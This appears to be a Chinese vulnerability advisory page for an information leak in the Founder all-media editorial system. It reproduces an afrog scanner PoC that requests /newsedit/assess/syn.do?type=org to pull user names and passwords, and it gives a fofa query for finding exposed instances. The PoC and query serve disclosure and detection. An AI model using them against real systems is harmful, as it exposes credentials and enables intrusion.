founder-syn-do-inclosure: 方正畅享全媒体采编系统敏感信息泄露

日期: 2025-09-01 | 影响软件: founder-syn-do-inclosure | POC: 已公开

漏洞描述

方正电子在传媒行业30多年的技术深耕为基础,与媒体单位的融合进程无缝适配,助力媒体单位逐步破除采编部门自成一体的藩篱,破除传统媒体、新闻网站和新媒体采编发环节的壁垒,创新内部组织结构,建立采编分离、全媒体生产的运行机制方正全媒体采编系统敏感信息泄露、可获取账号和密码。 fofa: app="FOUNDER-全媒体采编系统"

PoC代码[已公开]

id: founder-syn-do-inclosure

info:
  name: 方正畅享全媒体采编系统敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    方正电子在传媒行业30多年的技术深耕为基础,与媒体单位的融合进程无缝适配,助力媒体单位逐步破除采编部门自成一体的藩篱,破除传统媒体、新闻网站和新媒体采编发环节的壁垒,创新内部组织结构,建立采编分离、全媒体生产的运行机制方正全媒体采编系统敏感信息泄露、可获取账号和密码。
    fofa: app="FOUNDER-全媒体采编系统"
  tags: 方正,方正全媒体采编系统,founder,inclosure
  created: 2025/03/10

rules:
  r0:
    request:
      method: GET
      path: /newsedit/assess/syn.do?type=org
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'usercode') && 
      response.body.bcontains(b'username') && 
      response.body.bcontains(b'handesetnumber') && 
      response.body.bcontains(b'userpassword')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/founder-syn-do-inclosure.yaml

相关漏洞推荐